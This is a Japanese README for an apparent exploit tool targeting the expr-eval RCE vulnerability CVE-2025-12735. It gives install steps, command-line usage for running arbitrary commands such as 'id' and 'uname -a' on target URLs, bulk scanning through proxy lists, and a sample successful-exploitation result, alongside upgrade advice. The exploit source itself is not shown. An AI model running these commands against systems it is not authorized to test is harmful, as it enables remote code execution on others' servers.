
CVE-2025-12735 (expr-eval RCE vulnerability) を検出およびテストするためのセキュリティ調査ツール
expr-eval および expr-eval-fork npm パッケージにおける CVE-2025-12735 脆弱性を検出・テストするためのセキュリティ研究ツール。
このツールは 許可されたセキュリティテストおよび教育目的専用 です。コンピュータシステムへの不正アクセスは違法です。このツールは、自分が所有するシステム、またはテストに関する明示的な書面による許可を得たシステムでのみ使用してください。
CVE-2025-12735 は expr-eval および expr-eval-fork npm パッケージにおける重大なリモートコード実行(RCE)脆弱性です。この脆弱性により、攻撃者はパーサーが使用する context オブジェクト内に任意の関数を定義でき、システムレベルのコマンドを実行する悪意のあるコードを注入できます。
CVSS スコア: 9.8 (Critical)
影響を受けるバージョン: expr-eval-fork < 3.0.0
修正バージョン: expr-eval-fork v3.0.0+
# リポジトリのクローン
git clone https://github.com/AN5I/cve-2025-12735-expr-eval-rce.git
cd cve-2025-12735-expr-eval-rce
# 依存関係のインストール
pip install -r requirements.txt
# スクリプトを実行可能にする(任意)
chmod +x uknf_cve_2025_12735_expr_eval_rce.py
# スクリプトのダウンロード
wget https://raw.githubusercontent.com/AN5I/cve-2025-12735-expr-eval-rce/main/uknf_cve_2025_12735_expr_eval_rce.py
# 依存関係のインストール
pip install requests
# 単一ターゲット
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com
# カスタムコマンドの実行
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -c "whoami"
# ファイルから複数ターゲット
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json
# スレッドを使用した高速スキャン
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -t 5
# デバッグ用の詳細出力
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -v
# 単一プロキシ
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com --proxy http://proxy:port
# ファイルから複数プロキシ
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt
-u, --url ターゲットURL
-f, --file ターゲットURLが記載されたファイル(1行に1URL)
-c, --command 実行するコマンド(デフォルト: id)
-t, --threads スレッド数(デフォルト: 1)
-o, --output 出力ファイル(デフォルト: uknf_expr_eval_results.json)
-v, --verbose 詳細ログを有効化
--proxy プロキシURL(例: http://127.0.0.1:8080)
--proxy-list プロキシURLが記載されたファイル(1行に1URL)
スクリプトは詳細な結果を含む JSON ファイルを生成します:
{
"target": "http://target.com",
"timestamp": "2025-11-20T15:35:32.638109",
"expr_eval_detected": true,
"vulnerable": true,
"endpoint_found": true,
"exploitation_successful": true,
"command_executed": "id",
"output": "uid=1000(user) gid=1000(user)...",
"vulnerable_endpoint": "/api/evaluate"
}
expr-eval または expr-eval-fork を使用している場合:
直ちにアップグレード:
npm install expr-eval-fork@latest
セキュリティパッチを適用:
入力検証を実装:
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com
# ターゲットファイルの作成
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt
# スキャンの実行
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com -c "uname -a"
# 単一プロキシ
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com --proxy http://127.0.0.1:8080
# ファイルから複数プロキシ
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt
貢献を歓迎します!プルリクエストを遠慮なく送信してください。
git checkout -b feature/AmazingFeature)git commit -m 'Add some AmazingFeature')git push origin feature/AmazingFeature)問題が発生した場合や提案がある場合は、GitHub で Issue を開いてください。
このプロジェクトは MIT ライセンスの下でライセンスされています。詳細は LICENSE ファイルを参照してください。
このツールが役立つと思われましたら、GitHub でスターを付けていただけると幸いです!
このツールは教育目的および許可されたセキュリティテストのために提供されています。作者は、このプログラムの誤用やそれによって生じた損害について一切責任を負いません。ユーザーは、システムをテストする前に適切な許可を得ていることを確認する責任があります。
このツールが役に立ち、プロジェクトを支援したい場合:
Bitcoin (BTC):
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv
Ethereum (ETH):
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7
ご支援ありがとうございます! 🙏